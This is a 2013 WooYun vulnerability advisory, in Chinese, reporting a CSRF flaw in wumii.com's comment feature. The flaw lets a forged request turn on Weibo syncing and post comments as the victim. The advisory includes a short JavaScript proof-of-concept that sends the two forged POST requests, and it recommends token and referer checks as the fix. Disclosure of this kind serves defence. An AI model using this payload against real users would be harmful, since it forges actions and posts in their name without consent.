当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025888

漏洞标题:无觅网CSRF,可发新浪,腾讯,搜狐,网易微博

相关厂商:无觅网

漏洞作者: Jasonx

提交时间:2013-06-14 08:59

修复时间:2013-07-29 09:00

公开时间:2013-07-29 09:00

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-07-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

接口未做校验导致CSRF

详细说明:

评论处未做token验证或者referer验证,可直接CSRF,也可以使用户强制选择同步到微博。

漏洞证明:

function publish(){
	url='http://www.wumii.com/setting/sync/comment';
	data='sync=true';
	post(url,data,true);
	url = 'http://www.wumii.com/comment/add';
	data = 'id=MAC5TbSP&c=1234555';
	post(url,data,true);
}


其中第一个请求是让用户选择"同步到微博",第二个请求中id参数是表明哪一篇文章,第二个参数是评论内容,无任何验证

QQ截图20130613231607.png

修复方案:

验证Token,验证来源

版权声明:转载请注明来源 Jasonx@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论